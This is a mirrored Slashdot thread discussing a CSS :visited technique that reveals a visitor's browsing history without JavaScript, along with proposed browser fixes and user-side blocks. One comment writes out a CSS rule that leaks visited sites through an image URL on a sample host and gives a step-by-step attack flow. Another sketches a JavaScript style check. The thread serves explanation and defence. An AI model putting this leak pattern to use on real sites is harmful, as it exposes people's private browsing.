Slashdot Mirror


Sniffing Browser History Without Javascript

Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."

61 of 216 comments

  1. Well, we fixed it... by slarrg · · Score: 4, Funny

    You can't tell what sites I've been to if it's Slashdotted!

  2. Old stuff by kasot · · Score: 5, Informative

    The CSS history hack has been known since (at least) August 2006: http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

    1. Re:Old stuff by Anonymous Coward · · Score: 4, Informative

      Long before that, honestly.

      There are Firefox extensions that can help protect against this (see http://www.safecache.com/ and http://www.safehistory.com/ ), but they break enough things on the web that even their creators admit they're not terribly practical.

      (Disclaimer: Two of the folks that worked on this also worked for awhile on Chromium with me.)

    2. Re:Old stuff by zmooc · · Score: 5, Informative

      Bug 57351 - css on a:visited can load an image and/or reveal if visitor been to a site
      Reported: 2000-10-19 16:57 PDT by Jesse Ruderman

      --
      0x or or snor perron?!
    3. Re:Old stuff by glodime · · Score: 5, Informative

      Bug 57351

      Was marked as a duplicate of 147777
      See: https://bugzilla.mozilla.org/show_bug.cgi?id=147777

      Vitaly Sharovatov and Walt Gordon Jones have an interesting back and forth on ideas for a proper fix. Search the page linked below for "Walt Gordon Jones" to follow the conversation.
      http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/

      Walt Gordon Jones summarizes his point:

      The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn't mean it has to be used to mark up the rendered HTML on sites I visit. There's nothing that inextricably ties history to the browser's rendering engine.

    4. Re:Old stuff by Blakey+Rat · · Score: 2, Interesting

      Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)

      I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?

    5. Re:Old stuff by rytier · · Score: 2, Interesting

      moderation undo (sorry for OT)...

      --
      --- Naive inside, foolish outside...:)
    6. Re:Old stuff by Blakey+Rat · · Score: 2, Interesting

      Oh wait, I think I just got it.

      What he's doing is setting your CSS A:visited property to an image URL, which is defined based on your browser session. Something like:

      a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 ); }

      Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.

      So, the flowchart looks like:
      1) User visits page
      2) PHP script generates session ID for the visit
      3) PHP script writes an invisible iframe to the page, which includes
        - a link to an Target URL (the URL you're trying to find in the history)
        - a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
        - a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
      4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at

      Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.

      Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.

    7. Re:Old stuff by black6host · · Score: 2, Interesting

      Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. Whatever made me think, in this day and age, that anything I do, on the net or not, is private?

      Sorry, not to bash you, just sad commentary.....

    8. Re:Old stuff by Keeper+Of+Keys · · Score: 2, Interesting

      I for one would be quite happy if browsers disabled the ability to use the :visited pseudoclass in your own CSS, which would kill this one stone dead. It's hard enough getting designers to specify :hover states for links, and practically impossible to get :active states out of them - if they're even needed, which is debatable. Who bothers with :visited states? In anything other than body text, users are unlikely to understand why a certain link looks different anyway. It is occasionally useful to spot that a link embedded in text is one you've already followed, but invariably this is the browser's default styling showing through. Perhaps values of 'inherit' should be allowed, so you can turn off the browser default, but otherwise... pfff! get rid of it.

    9. Re:Old stuff by eiMichael · · Score: 5, Insightful

      Just make "visited" only apply within that domain, like a bastardized cookie. I don't care that us.gov knows which other us.gov links I've been to, but I don't want my browser reporting that I've also been to al-quada.org.

    10. Re:Old stuff by Philip_the_physicist · · Score: 5, Interesting

      Alternatively, make browsers download all the pseudoclasses for links, so that it is impossible for sites to use this to track users, but without removing the utility of having marked "visited" links. This could be done by browsers without needing any change to the standards, AFAICT.

    11. Re:Old stuff by drinkypoo · · Score: 2, Interesting

      This could be done by browsers without needing any change to the standards, AFAICT.

      It can't be done without generating a lot of unnecessary bandwidth, though, and harshing major on dialup users (who are already getting their asses kicked hard enough.)

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    12. Re:Old stuff by pavon · · Score: 3, Informative

      No it wouldn't. Most legitimate sites don't do anything exotic with the visited property, they just change color or font properties. Even those that do use the background property or some other property that accepts urls will have a single url that applies to all or a large class of visited links. The only sites that would generate a lot of bandwidth are the tiny minority that intentionally have a different visited resource for each link on their site. They have an interest in keeping this bandwidth low themselves and will make those resources as small as possible. Hell, the CSS dictating all these resources might even be as large as the resources themselves. Honestly, this is a complete non-issue compared to the bandwidth problems caused by plain old bad site design.

    13. Re:Old stuff by zobier · · Score: 4, Informative

      Alternatively, add
      a:visited { background-image: none ! important; }
      To your userContent.css
      I can confirm that this works.

      --
      Me lost me cookie at the disco.
  3. big issue is NoScript by bcrowell · · Score: 5, Informative

    I'd care a lot more about this if NoScript was still a viable option. NoScript has become malware at this point. The real issue is the need for someone more trustworthy to make a simpler, and more trustworthy replacement for NoScript. Please? Pretty please?

    1. Re:big issue is NoScript by Anonymous Coward · · Score: 5, Interesting

      This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!

    2. Re:big issue is NoScript by bcrowell · · Score: 5, Insightful

      Stop overreacting, that is old news and long since fixed.

      Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

      NoScript is no more "malware" than Firefox itself.

      This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

      I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

      I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

    3. Re:big issue is NoScript by bcrowell · · Score: 5, Insightful

      It seems like it's been fixed.

      The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

    4. Re:big issue is NoScript by gavron · · Score: 2, Informative

      You CAN mod and comment. When you make the comment, the mods you made go away. If you comment first, you cannot mod.

      So the mods could come in here and explain, but then their mods would be gone :)

      Heisenberg, we hardly knew ya.

      E

    5. Re:big issue is NoScript by mrmeval · · Score: 3, Informative

      He was trying to work around a problem with easylist and handled it badly but easylist is as much to blame for targeting him.

      He answers his emails if you care to ask but easylist has ignored me so far.

      --
      I'd go on a Vegan diet but the delivery time from Vega is too long. --brownkitty
    6. Re:big issue is NoScript by Blue+Stone · · Score: 3, Insightful

      If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to apologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

      Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, I suggest you consider a concept called 'forgiveness' which, I believe, is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

      (I don't know the guy & I use both noscript and adblock+ with easylist)

      --
      Corporation, n. An ingenious device for obtaining individual profit without individual responsibility. - Ambrose Bierce
    7. Re:big issue is NoScript by Korin43 · · Score: 5, Insightful

      Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.

    8. Re:big issue is NoScript by NimbleSquirrel · · Score: 4, Interesting

      On the surface it seems like NoScript had descended to the point of malware, but take a look into the history of why Giorgio did what he did and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.

      Yes, there needs to be a more trustworthy NoScript, but at the same time there also needs to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.

      I, personally have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.

    9. Re:big issue is NoScript by Barny · · Score: 2, Interesting

      Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.

      NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).

      --
      ...
      /me sighs
    10. Re:big issue is NoScript by VGPowerlord · · Score: 5, Informative

      If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to apologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

      From what I hear, he only "apologized" and fixed the problem for several reasons:
      1. Because the Firefox devs said that NoScript was breaking Firefox's Add-on Policy when it started monkeying around with AdBlock Plus.
      2. NoScript's rating was plummeting on the Firefox Add-on site. If this rating drops too much, NoScript would no longer be considered a trusted add-on, and therefore every version would be subject to security review before it exited the Sandbox.

      Oh, yes, you read that correctly. NoScript is currently not reviewed before new versions go up on the Firefox add-on site.

      Incidentally, Mozilla made a new policy spelling out some restrictions for add-ons after this incident.

      --
      GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
    11. Re:big issue is NoScript by supernova_hq · · Score: 5, Insightful

      Don't confuse forgiveness with trust.

      If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?

    12. Re:big issue is NoScript by yoyhed · · Score: 4, Funny

      Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system?

      Does Ubuntu come with emacs?

      --
      WHO NEEDS SHIFT WHEN YOU HAVE CAPSLOCK/ DAMN1
    13. Re:big issue is NoScript by Bill+Dog · · Score: 2

      Whether to stop trusting after one "mistake" is a personal decision. But one betrayal is evidence of untrustworthiness.

      --
      Attention zealots and haters: 00100 00100
    14. Re:big issue is NoScript by arose · · Score: 2, Insightful

      Half apology, half counterattack.

      Most of his users want stuff blocked, not to look at his ads; they don't consider him or Google special, so why not white list all advertisers, not only his own? Not to mention the update mill and resulting page visits. If he could manage to not realize what the hell he was doing once (and I'm not sure I believe that, the default white list and updates had made me iffy even before the incident), he can do it again. I don't want to be there when that happens, not after opening adblock plus one day and seeing white lists I never added and I never had EasyList, just a handful of manually added rules.

      --
      Analogies don't equal equalities, they are merely somewhat analogous.
  4. Re:Will it.. by orange47 · · Score: 4, Informative

    it's easy to tell, with that nickname of yours.. :)

  5. How to interpret results by noidentity · · Score: 4, Funny

    If the server responds

    Service Temporarily Unavailable

    The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

    then it means you've come from Slashdot.

  6. Doesn't work on me by MrMista_B · · Score: 2, Informative

    Doesn't work on me - Firefox, with adblock plus, element hiding helper, and flashblock, running whatever the latest Ubuntu is.

    1. Re:Doesn't work on me by Kotoku · · Score: 4, Funny

      Awesome! Now for all the people who can take and act upon that advice, we can protect .000001% of the population.

      It's a start!

  7. Old, sure... by sootman · · Score: 3, Interesting

    ... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  8. Re:For the Masses by CopaceticOpus · · Score: 3, Insightful

    Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

  9. Re:For the Masses by digitalunity · · Score: 2, Informative

    Maybe just clear your cache more often. It's easy, fast and good practice. Ctrl-Shift-Del, press enter.

    Do this every time you close FF.

    --
    You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
  10. Re:For the Masses by Goaway · · Score: 4, Insightful

    Some of us actually use the browser history.

  11. Re:It requires an iframe, so noscript will help yo by yacc143 · · Score: 5, Informative

    It does not require an iframe. It's just that this way it's easier to hide any visual clues.

    The basic hack works simply. It sets a different style for visited links. (As such it will only match exact URLs). And one of the cool things your style for visited links specifies is a background URL that works as a webbug.

    yacc

  12. Re:For the Masses by MightyYar · · Score: 5, Insightful

    Most people will never understand and basic exploits like this will always work against them.

    So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

    --
    W..w..W - Willy Waterloo washes Warren Wiggins who is washing Waldo Woo.
  13. Alarming? by actionbastard · · Score: 2, Insightful

    From an exploit standpoint, no. From an editorial standpoint, yes.

    --
    Sig this!
    1. Re: Alarming? by transporter_ii · · Score: 2, Funny

      Well, at least I don't have the hiccups any more.
      .
      .

      --
      Doctors destroy health, lawyers destroy justice, universities destroy knowledge, religion destroys spirituality
  14. Re:For the Masses by Opportunist · · Score: 5, Funny

    And some of us use one browser for their everyday surfing and one for the naughty pages... I mean, I would do that if I surfed to naughty pages, of course...

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  15. Re:For the Masses by sootman · · Score: 2, Informative

    Small but important distinction: this exploit is for browser history, not cache. That shortcut (or shift-command-delete* on a Mac) will bring up the 'clear private data' dialog which covers browser history (the one this exploit is for), download history, saved form and search history, browser cache, and other items.

    * Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  16. In Soviet Russia, web sites visit you by Skapare · · Score: 3, Interesting

    I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window". Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

    --
    now we need to go OSS in diesel cars
    1. Re:In Soviet Russia, web sites visit you by Anonymous Coward · · Score: 2, Insightful

      Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

      Script plz?

      This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.
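
The launcher Skapare describes above, and the script the Anonymous Coward asks for, as an added example that is not the poster's own script: a POSIX shell function that clones a template directory into a throwaway HOME, starts the browser with HOME pointed there and with -no-remote (the same flag Z80xxc! gives for Windows further down, which stops Firefox from handing the URL to an instance that is already running), and deletes the directory when the browser exits. The template location $HOME/.browser-template and the BROWSER_TEMPLATE and BROWSER overrides are assumptions; the template has to hold whatever dotfiles the browser expects (for Firefox on Linux, a .mozilla tree with a profile created once by hand). It is Unix shell, not the .BAT translation the reply asks about.

```shell
#!/bin/sh
# Added example: one throwaway HOME per browser launch, so every instance
# starts with an empty history, cookie jar and cache, and a :visited probe can
# only see what that one instance visited. The template directory and the two
# environment-variable overrides are assumptions, not from the thread.

# Copy the template into a fresh private directory and print its path.
make_isolated_home() {
    template="${BROWSER_TEMPLATE:-$HOME/.browser-template}"   # assumed location
    dir=$(mktemp -d "${TMPDIR:-/tmp}/isohome.XXXXXX") || return 1
    if [ -d "$template" ]; then
        # "$template/." copies the contents, dotfiles included.
        cp -R "$template/." "$dir/" || { rm -rf "$dir"; return 1; }
    fi
    printf '%s\n' "$dir"
}

# Run the browser with HOME pointed at a fresh copy, then delete the copy.
# -no-remote keeps Firefox from merging this launch into a running instance,
# which would put the new session back into that instance's shared history.
launch_isolated() {
    browser="${BROWSER:-firefox}"
    home=$(make_isolated_home) || return 1
    if ( HOME="$home" "$browser" -no-remote "$@" ); then
        status=0
    else
        status=$?
    fi
    rm -rf "$home"
    return "$status"
}

# Usage: launch_isolated https://example.org/
```

Nothing from a session survives the call, so bookmarks or saved passwords have to live in the template, where they are copied read-only into every launch. The same isolation can be had without touching HOME by passing Firefox a per-launch -profile directory, but the HOME approach works for any browser and also catches anything else the program writes under the home directory.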

    2. Re:In Soviet Russia, web sites visit you by Blakey+Rat · · Score: 2, Informative

      So... you posted just to brag about the extreme efforts you go to to support your irrational paranoia?

      Thanks, I guess?

  17. Re:How To Fix Without Breaking CSS by Skapare · · Score: 2, Interesting

    IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS can see these style variations and this can expose detection of sites you have visited).

    --
    now we need to go OSS in diesel cars
  18. Comment removed by account_deleted · · Score: 4, Interesting

    Comment removed based on user account deletion

  19. Re:Web Bug Blockers by Snowblindeye · · Score: 2, Informative

    You should only load remote images on demand.

    [...]

    Yeah , I know must be new here..

    You're not new here, I can tell by the fact that you didn't read the article. Or the summary ;)

    This feature actually works like you want it to: It *does* load on demand. And that's the problem here. If it always loaded it this exploit wouldn't work. It's based on only being loaded on demand.

  20. Re:Chrome by Z80xxc! · · Score: 4, Informative

    would be a lot easier if I could run two separate instances of Firefox simultaneously.

    Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in separate memory space.

    This functionality already exists.

    "%programfiles%\Mozilla Firefox\firefox.exe" -P "profile to use" -no-remote

  21. Re:For the Masses by dmomo · · Score: 3, Interesting

    It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.

    If a page has the rule: a:visited { color: red; }

    And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');

    I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.

    The point here is, the solution is not dead simple.

  22. Re:OT: Re:big issue is NoScript by BrokenHalo · · Score: 5, Insightful

    the "no mod and comment" rule is perhaps one of the most ill-conceived rules I have seen.

    Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

    Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.

  23. Re:For the Masses by Keeper+Of+Keys · · Score: 2, Interesting

    is there really a good need or use for a hidden flag on iframes at all??
    I honestly don't know, maybe it's one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...

    With CSS you can hide anything you want to, in a number of different ways, and there are myriad reasons for wanting to do this. Most ajax sites would look a lot worse if the frames they use to silently load your data in the background were suddenly visible.

  24. simple block by Anonymous Coward · · Score: 3, Informative

    putting the rule

    a:visited {
        background: none !important;
    }

    in userContent.css seems to stop this particular scan.

  25. Re:For the Masses by aamcf · · Score: 2, Insightful

    Unless you're visiting illegal sites.

    Or sites that are unpopular among your peer group.

    And what about people in repressive regimes who visit illegal sites?

    By exposing your history, there is pressure on you to conform to the standards of those who hold power over you. Not a good thing.

  26. Re:For the Masses by MrMr · · Score: 2, Funny

    I like having my browser history so I can tell if I've read something or not.
    I think you'll find that ./ has found a way around that trick.
    Just duplicate a story from 2000, 2006 and 2009 with slightly different url's.

  27. Re:Will it.. by tiananmen+tank+man · · Score: 2, Insightful

    The parent post is marked informative? Informative like it is easy to tell who is a terrorist by the length of their beard?

  28. Simple... by BrokenHalo · · Score: 2, Interesting

    No, the simplest solution is to adopt a policy I took up in the late '90s when it first occurred to me that my history might be sniffed:

    Delete it.

    That's right. It's perfectly possible to live a fulfilled life without browser history, or cookies for that matter. In fact, I still have my cookies file symlinked to /dev/null, though I am aware that current browsers offer an option to clear it...

  29. Re:Disable :visited in Firefox by fcparfait · · Score: 2, Informative

    layout.css.visited_links_enabled = false

    Note: this works only in Firefox 3.5 (Beta/Preview).

    By the way, if you are using Firefox 3.5 with layout.css.visited_links_enabled = false and you still want some visual clue for visited links, try my Link Status extension! (How pushy....)

  30. layout.css.visited_links_enabled by Anonymous Coward · · Score: 2, Informative

    or change the about:config setting called "layout.css.visited_links_enabled"